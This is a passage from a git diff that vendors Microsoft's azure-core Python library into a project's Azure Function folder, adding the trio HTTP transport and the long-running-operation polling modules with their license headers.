HttpResponseError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + +class TrioRequestsTransportResponse(AsyncHttpResponse, RequestsTransportResponse): # type: ignore + """Asynchronous streaming of data from the response. + """ + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: # type: ignore + """Generator for streaming response data. + """ + return TrioStreamDownloadGenerator(pipeline, self, **kwargs) + + +class TrioRequestsTransport(RequestsAsyncTransportBase): # type: ignore + """Identical implementation as the synchronous RequestsTransport wrapped in a class with + asynchronous methods. Uses the third party trio event loop. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START trio] + :end-before: [END trio] + :language: python + :dedent: 4 + :caption: Asynchronous transport with trio. + """ + async def __aenter__(self): + return super(TrioRequestsTransport, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(TrioRequestsTransport, self).__exit__() + + async def sleep(self, duration): # pylint:disable=invalid-overridden-method + await trio.sleep(duration) + + @overload # type: ignore + async def send(self, request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse: # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. 
+ :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + @overload # type: ignore + async def send(self, request: "RestHttpRequest", **kwargs: Any) -> "RestAsyncHttpResponse": # pylint:disable=invalid-overridden-method + """Send an `azure.core.rest` request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.rest.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.rest.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + async def send(self, request, **kwargs: Any): # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + self.open() + trio_limiter = kwargs.get("trio_limiter", None) + response = None + error = None # type: Optional[AzureErrorUnion] + data_to_send = await self._retrieve_request_data(request) + try: + try: + response = await trio.to_thread.run_sync( + functools.partial( + self.session.request, + request.method, + request.url, + headers=request.headers, + data=data_to_send, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=kwargs.pop('connection_timeout', self.connection_config.timeout), + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs), + limiter=trio_limiter) + except AttributeError: # trio < 0.12.1 + response = await trio.run_sync_in_worker_thread( # pylint: disable=no-member + functools.partial( + self.session.request, + request.method, + request.url, + headers=request.headers, + data=request.data, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=kwargs.pop('connection_timeout', self.connection_config.timeout), + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs), + limiter=trio_limiter) + response.raw.enforce_content_length = True + + except urllib3.exceptions.NewConnectionError as err: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ReadTimeout as err: + error = ServiceResponseError(err, error=err) + except requests.exceptions.ConnectionError as err: + if err.args and isinstance(err.args[0], urllib3.exceptions.ProtocolError): + error = ServiceResponseError(err, error=err) + else: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + error = IncompleteReadError(err, error=err) + else: + _LOGGER.warning("Unable to stream download: %s", err) + error = HttpResponseError(err, error=err) + except requests.RequestException as err: + error = ServiceRequestError(err, error=err) + + if error: + raise error + if _is_rest(request): + from azure.core.rest._requests_trio import 
RestTrioRequestsTransportResponse + retval = RestTrioRequestsTransportResponse( + request=request, + internal_response=response, + block_size=self.connection_config.data_block_size, + ) + if not kwargs.get("stream"): + await _handle_no_stream_rest_response(retval) + return retval + + return TrioRequestsTransportResponse(request, response, self.connection_config.data_block_size) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__init__.py new file mode 100644 index 0000000..47c99b1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__init__.py @@ -0,0 +1,35 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+# +# -------------------------------------------------------------------------- +import sys + +from ._poller import LROPoller, NoPolling, PollingMethod +__all__ = ['LROPoller', 'NoPolling', 'PollingMethod'] + +#pylint: disable=unused-import +if sys.version_info >= (3, 5, 2): + # Not executed on old Python, no syntax error + from ._async_poller import AsyncNoPolling, AsyncPollingMethod, async_poller, AsyncLROPoller + __all__ += ['AsyncNoPolling', 'AsyncPollingMethod', 'async_poller', 'AsyncLROPoller'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..4605ae0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_async_poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_async_poller.cpython-39.pyc new file mode 100644 index 0000000..7d61916 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_async_poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_poller.cpython-39.pyc new file mode 100644 index 0000000..9858e05 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc new file mode 100644 index 0000000..bb4d53e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/base_polling.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/base_polling.cpython-39.pyc new file mode 100644 index 0000000..05b2f5d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/base_polling.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_async_poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_async_poller.py new file mode 100644 index 0000000..edf26eb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_async_poller.py @@ -0,0 +1,202 @@ +# 
-------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import logging +from collections.abc import Awaitable +from typing import Callable, Any, Tuple, Generic, TypeVar, Generator + +from ..exceptions import AzureError +from ._poller import NoPolling as _NoPolling + + +PollingReturnType = TypeVar("PollingReturnType") + +_LOGGER = logging.getLogger(__name__) + + +class AsyncPollingMethod(Generic[PollingReturnType]): + """ABC class for polling method. + """ + def initialize(self, client: Any, initial_response: Any, deserialization_callback: Any) -> None: + raise NotImplementedError("This method needs to be implemented") + + async def run(self) -> None: + raise NotImplementedError("This method needs to be implemented") + + def status(self) -> str: + raise NotImplementedError("This method needs to be implemented") + + def finished(self) -> bool: + raise NotImplementedError("This method needs to be implemented") + + def resource(self) -> PollingReturnType: + raise NotImplementedError("This method needs to be implemented") + + def get_continuation_token(self) -> str: + raise TypeError( + "Polling method '{}' doesn't support get_continuation_token".format( + self.__class__.__name__ + ) + ) + + @classmethod + def from_continuation_token(cls, continuation_token: str, **kwargs) -> Tuple[Any, Any, Callable]: + raise TypeError( + "Polling method '{}' doesn't support from_continuation_token".format( + cls.__name__ + ) + ) + + +class AsyncNoPolling(_NoPolling): + """An empty async poller that returns the deserialized initial response. + """ + async def run(self): # pylint:disable=invalid-overridden-method + """Empty run, no polling. + Just override initial run to add "async" + """ + + +async def async_poller(client, initial_response, deserialization_callback, polling_method): + """Async Poller for long running operations. + + .. deprecated:: 1.5.0 + Use :class:`AsyncLROPoller` instead. + + :param client: A pipeline service client. + :type client: ~azure.core.PipelineClient + :param initial_response: The initial call response + :type initial_response: ~azure.core.pipeline.PipelineResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. 
+ If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: ~azure.core.polling.PollingMethod + """ + poller = AsyncLROPoller(client, initial_response, deserialization_callback, polling_method) + return await poller + + +class AsyncLROPoller(Generic[PollingReturnType], Awaitable): + """Async poller for long running operations. + + :param client: A pipeline service client + :type client: ~azure.core.PipelineClient + :param initial_response: The initial call response + :type initial_response: ~azure.core.pipeline.PipelineResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. + If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: ~azure.core.polling.AsyncPollingMethod + """ + + def __init__( + self, + client: Any, + initial_response: Any, + deserialization_callback: Callable, + polling_method: AsyncPollingMethod[PollingReturnType] + ): + self._polling_method = polling_method + self._done = False + + # This implicit test avoids bringing in an explicit dependency on Model directly + try: + deserialization_callback = deserialization_callback.deserialize # type: ignore + except AttributeError: + pass + + self._polling_method.initialize(client, initial_response, deserialization_callback) + + def polling_method(self) -> AsyncPollingMethod[PollingReturnType]: + """Return the polling method associated to this poller. + """ + return self._polling_method + + def continuation_token(self) -> str: + """Return a continuation token that allows to restart the poller later. + + :returns: An opaque continuation token + :rtype: str + """ + return self._polling_method.get_continuation_token() + + @classmethod + def from_continuation_token( + cls, + polling_method: AsyncPollingMethod[PollingReturnType], + continuation_token: str, + **kwargs + ) -> "AsyncLROPoller[PollingReturnType]": + client, initial_response, deserialization_callback = polling_method.from_continuation_token( + continuation_token, **kwargs + ) + return cls(client, initial_response, deserialization_callback, polling_method) + + def status(self) -> str: + """Returns the current status string. + + :returns: The current status string + :rtype: str + """ + return self._polling_method.status() + + async def result(self) -> PollingReturnType: + """Return the result of the long running operation. + + :returns: The deserialized resource of the long running operation, if one is available. + :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query. + """ + await self.wait() + return self._polling_method.resource() + + def __await__(self) -> Generator[Any, None, PollingReturnType]: + return self.result().__await__() + + async def wait(self) -> None: + """Wait on the long running operation. + + :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query. 
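Since `AsyncLROPoller` implements `__await__` by delegating to `result()`, callers can await the poller directly; a sketch (the `begin_delete_widget` client method is purely illustrative):

```python
poller = await client.begin_delete_widget("w1")  # hypothetical begin_* method
print(poller.status())                           # e.g. "InProgress"
result = await poller                            # same as: await poller.result()
```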
+ """ + try: + await self._polling_method.run() + except AzureError as error: + if not error.continuation_token: + try: + error.continuation_token = self.continuation_token() + except Exception as err: # pylint: disable=broad-except + _LOGGER.warning("Unable to retrieve continuation token: %s", err) + error.continuation_token = None + raise + self._done = True + + def done(self) -> bool: + """Check status of the long running operation. + + :returns: 'True' if the process has completed, else 'False'. + :rtype: bool + """ + return self._done diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_poller.py new file mode 100644 index 0000000..bae46f4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_poller.py @@ -0,0 +1,311 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import base64 +import logging +import threading +import uuid +try: + from urlparse import urlparse # type: ignore # pylint: disable=unused-import +except ImportError: + from urllib.parse import urlparse + +from typing import TYPE_CHECKING, TypeVar, Generic +from azure.core.exceptions import AzureError +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.common import with_current_context + +if TYPE_CHECKING: + from typing import Any, Callable, Union, List, Optional, Tuple + + +PollingReturnType = TypeVar("PollingReturnType") + +_LOGGER = logging.getLogger(__name__) + + +class PollingMethod(Generic[PollingReturnType]): + """ABC class for polling method. 
+ """ + def initialize(self, client, initial_response, deserialization_callback): + # type: (Any, Any, Any) -> None + raise NotImplementedError("This method needs to be implemented") + + def run(self): + # type: () -> None + raise NotImplementedError("This method needs to be implemented") + + def status(self): + # type: () -> str + raise NotImplementedError("This method needs to be implemented") + + def finished(self): + # type: () -> bool + raise NotImplementedError("This method needs to be implemented") + + def resource(self): + # type: () -> PollingReturnType + raise NotImplementedError("This method needs to be implemented") + + def get_continuation_token(self): + # type() -> str + raise TypeError( + "Polling method '{}' doesn't support get_continuation_token".format( + self.__class__.__name__ + ) + ) + + @classmethod + def from_continuation_token(cls, continuation_token, **kwargs): + # type(str, Any) -> Tuple[Any, Any, Callable] + raise TypeError( + "Polling method '{}' doesn't support from_continuation_token".format( + cls.__name__ + ) + ) + + +class NoPolling(PollingMethod): + """An empty poller that returns the deserialized initial response. + """ + def __init__(self): + self._initial_response = None + self._deserialization_callback = None + + def initialize(self, _, initial_response, deserialization_callback): + # type: (Any, Any, Callable) -> None + self._initial_response = initial_response + self._deserialization_callback = deserialization_callback + + def run(self): + # type: () -> None + """Empty run, no polling. + """ + + def status(self): + # type: () -> str + """Return the current status as a string. + + :rtype: str + """ + return "succeeded" + + def finished(self): + # type: () -> bool + """Is this polling finished? + + :rtype: bool + """ + return True + + def resource(self): + # type: () -> Any + return self._deserialization_callback(self._initial_response) + + def get_continuation_token(self): + # type() -> str + import pickle + return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii') + + @classmethod + def from_continuation_token(cls, continuation_token, **kwargs): + # type(str, Any) -> Tuple + try: + deserialization_callback = kwargs["deserialization_callback"] + except KeyError: + raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token") + import pickle + initial_response = pickle.loads(base64.b64decode(continuation_token)) # nosec + return None, initial_response, deserialization_callback + + +class LROPoller(Generic[PollingReturnType]): + """Poller for long running operations. + + :param client: A pipeline service client + :type client: ~azure.core.PipelineClient + :param initial_response: The initial call response + :type initial_response: ~azure.core.pipeline.PipelineResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. + If a subclass of Model is given, this passes "deserialize" as callback. 
+ :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: ~azure.core.polling.PollingMethod + """ + + def __init__(self, client, initial_response, deserialization_callback, polling_method): + # type: (Any, Any, Callable, PollingMethod[PollingReturnType]) -> None + self._callbacks = [] # type: List[Callable] + self._polling_method = polling_method + + # This implicit test avoids bringing in an explicit dependency on Model directly + try: + deserialization_callback = deserialization_callback.deserialize # type: ignore + except AttributeError: + pass + + # Might raise a CloudError + self._polling_method.initialize(client, initial_response, deserialization_callback) + + # Prepare thread execution + self._thread = None + self._done = None + self._exception = None + if not self._polling_method.finished(): + self._done = threading.Event() + self._thread = threading.Thread( + target=with_current_context(self._start), + name="LROPoller({})".format(uuid.uuid4())) + self._thread.daemon = True + self._thread.start() + + def _start(self): + """Start the long running operation. + On completion, runs any callbacks. + + :param callable update_cmd: The API request to check the status of + the operation. + """ + try: + self._polling_method.run() + except AzureError as error: + if not error.continuation_token: + try: + error.continuation_token = self.continuation_token() + except Exception as err: # pylint: disable=broad-except + _LOGGER.warning("Unable to retrieve continuation token: %s", err) + error.continuation_token = None + + self._exception = error + except Exception as error: # pylint: disable=broad-except + self._exception = error + + finally: + self._done.set() + + callbacks, self._callbacks = self._callbacks, [] + while callbacks: + for call in callbacks: + call(self._polling_method) + callbacks, self._callbacks = self._callbacks, [] + + def polling_method(self): + # type: () -> PollingMethod[PollingReturnType] + """Return the polling method associated to this poller. + """ + return self._polling_method + + def continuation_token(self): + # type: () -> str + """Return a continuation token that allows to restart the poller later. + + :returns: An opaque continuation token + :rtype: str + """ + return self._polling_method.get_continuation_token() + + @classmethod + def from_continuation_token(cls, polling_method, continuation_token, **kwargs): + # type: (PollingMethod[PollingReturnType], str, Any) -> LROPoller[PollingReturnType] + client, initial_response, deserialization_callback = polling_method.from_continuation_token( + continuation_token, **kwargs + ) + return cls(client, initial_response, deserialization_callback, polling_method) + + def status(self): + # type: () -> str + """Returns the current status string. + + :returns: The current status string + :rtype: str + """ + return self._polling_method.status() + + def result(self, timeout=None): + # type: (Optional[int]) -> PollingReturnType + """Return the result of the long running operation, or + the result available after the specified timeout. + + :returns: The deserialized resource of the long running operation, + if one is available. + :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query. + """ + self.wait(timeout) + return self._polling_method.resource() + + @distributed_trace + def wait(self, timeout=None): + # type: (Optional[float]) -> None + """Wait on the long running operation for a specified length + of time. 
You can check if this call has ended with timeout with the
+        "done()" method.
+
+        :param float timeout: Period of time to wait for the long running
+            operation to complete (in seconds).
+        :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
+        """
+        if self._thread is None:
+            return
+        self._thread.join(timeout=timeout)
+        try:
+            # Let's handle possible None in forgiveness here
+            # https://github.com/python/mypy/issues/8165
+            raise self._exception # type: ignore
+        except TypeError: # Was None
+            pass
+
+    def done(self):
+        # type: () -> bool
+        """Check status of the long running operation.
+
+        :returns: 'True' if the process has completed, else 'False'.
+        :rtype: bool
+        """
+        return self._thread is None or not self._thread.is_alive()
+
+    def add_done_callback(self, func):
+        # type: (Callable) -> None
+        """Add callback function to be run once the long running operation
+        has completed - regardless of the status of the operation.
+
+        :param callable func: Callback function that takes at least one
+            argument, a completed LongRunningOperation.
+        """
+        # Still use "_done" and not "done", since callbacks are executed inside the thread.
+        if self._done is None or self._done.is_set():
+            func(self._polling_method)
+        # Let's add them still, for consistency (if you wish to access it for some reason)
+        self._callbacks.append(func)
+
+    def remove_done_callback(self, func):
+        # type: (Callable) -> None
+        """Remove a callback from the long running operation.
+
+        :param callable func: The function to be removed from the callbacks.
+        :raises ValueError: if the long running operation has already completed.
+        """
+        if self._done is None or self._done.is_set():
+            raise ValueError("Process is complete.")
+        self._callbacks = [c for c in self._callbacks if c != func]
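Taken together, a typical consumption pattern for this synchronous poller looks like the following sketch (`poller` is assumed to come from some `begin_*` client method; `client` and `callback` are stand-ins):

```python
def on_finished(polling_method):
    print("LRO finished with status:", polling_method.status())

poller.add_done_callback(on_finished)
poller.wait(timeout=30)  # block up to 30 seconds

if poller.done():
    result = poller.result()
else:
    # Opaque token (base64 of the pickled initial response) to resume later:
    token = poller.continuation_token()
    # poller = LROPoller.from_continuation_token(
    #     polling_method=LROBasePolling(),
    #     continuation_token=token,
    #     client=client,                      # required kwarg
    #     deserialization_callback=callback,  # required kwarg
    # )
```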
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/async_base_polling.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/async_base_polling.py
new file mode 100644
index 0000000..c8af4b2
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/async_base_polling.py
@@ -0,0 +1,140 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+from ..exceptions import HttpResponseError
+from .base_polling import (
+    _failed,
+    BadStatus,
+    BadResponse,
+    OperationFailed,
+    LROBasePolling,
+    _raise_if_bad_http_status_and_method,
+)
+from ..pipeline._tools import is_rest
+
+__all__ = ["AsyncLROBasePolling"]
+
+
+class AsyncLROBasePolling(LROBasePolling):
+    """A subclass of LROBasePolling that redefines "run" as async.
+    """
+
+    async def run(self): # pylint:disable=invalid-overridden-method
+        try:
+            await self._poll()
+
+        except BadStatus as err:
+            self._status = "Failed"
+            raise HttpResponseError(
+                response=self._pipeline_response.http_response,
+                error=err
+            )
+
+        except BadResponse as err:
+            self._status = "Failed"
+            raise HttpResponseError(
+                response=self._pipeline_response.http_response,
+                message=str(err),
+                error=err
+            )
+
+        except OperationFailed as err:
+            raise HttpResponseError(
+                response=self._pipeline_response.http_response,
+                error=err
+            )
+
+    async def _poll(self): # pylint:disable=invalid-overridden-method
+        """Poll status of operation so long as operation is incomplete and
+        we have an endpoint to query.
+
+        :raises: OperationFailed if operation status 'Failed' or 'Canceled'.
+        :raises: BadStatus if response status invalid.
+        :raises: BadResponse if response invalid.
+        """
+
+        while not self.finished():
+            await self._delay()
+            await self.update_status()
+
+        if _failed(self.status()):
+            raise OperationFailed("Operation failed or canceled")
+
+        final_get_url = self._operation.get_final_get_url(self._pipeline_response)
+        if final_get_url:
+            self._pipeline_response = await self.request_status(final_get_url)
+            _raise_if_bad_http_status_and_method(self._pipeline_response.http_response)
+
+    async def _sleep(self, delay): # pylint:disable=invalid-overridden-method
+        await self._transport.sleep(delay)
+
+    async def _delay(self): # pylint:disable=invalid-overridden-method
+        """Check for a 'retry-after' header to set timeout,
+        otherwise use configured timeout.
+        """
+        delay = self._extract_delay()
+        await self._sleep(delay)
+
+    async def update_status(self): # pylint:disable=invalid-overridden-method
+        """Update the current status of the LRO.
+        """
+        self._pipeline_response = await self.request_status(
+            self._operation.get_polling_url()
+        )
+        _raise_if_bad_http_status_and_method(self._pipeline_response.http_response)
+        self._status = self._operation.get_status(self._pipeline_response)
+
+    async def request_status(self, status_link): # pylint:disable=invalid-overridden-method
+        """Do a simple GET to this status link.
+
+        This method re-injects 'x-ms-client-request-id'.
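To wire this class up by hand (client libraries normally do this internally), one might write, assuming `client`, `initial_response`, and `deserialization_callback` come from an earlier pipeline call:

```python
from azure.core.polling import AsyncLROPoller
from azure.core.polling.async_base_polling import AsyncLROBasePolling

poller = AsyncLROPoller(
    client, initial_response, deserialization_callback,
    AsyncLROBasePolling(timeout=5),  # fallback delay between polls, in seconds
)
result = await poller
```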
+ + :rtype: azure.core.pipeline.PipelineResponse + """ + if self._path_format_arguments: + status_link = self._client.format_url(status_link, **self._path_format_arguments) + # Re-inject 'x-ms-client-request-id' while polling + if "request_id" not in self._operation_config: + self._operation_config["request_id"] = self._get_request_id() + if is_rest(self._initial_response.http_response): + # if I am a azure.core.rest.HttpResponse + # want to keep making azure.core.rest calls + from azure.core.rest import HttpRequest as RestHttpRequest + request = RestHttpRequest("GET", status_link) + return await self._client.send_request( + request, _return_pipeline_response=True, **self._operation_config + ) + # if I am a azure.core.pipeline.transport.HttpResponse + request = self._client.get(status_link) + + return await self._client._pipeline.run( # pylint: disable=protected-access + request, stream=False, **self._operation_config + ) + +__all__ = [ + 'AsyncLROBasePolling' +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/base_polling.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/base_polling.py new file mode 100644 index 0000000..b8c4e51 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/base_polling.py @@ -0,0 +1,639 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc +import base64 +import json +from enum import Enum +from typing import TYPE_CHECKING, Optional, Any, Union + +from ..exceptions import HttpResponseError, DecodeError +from . 
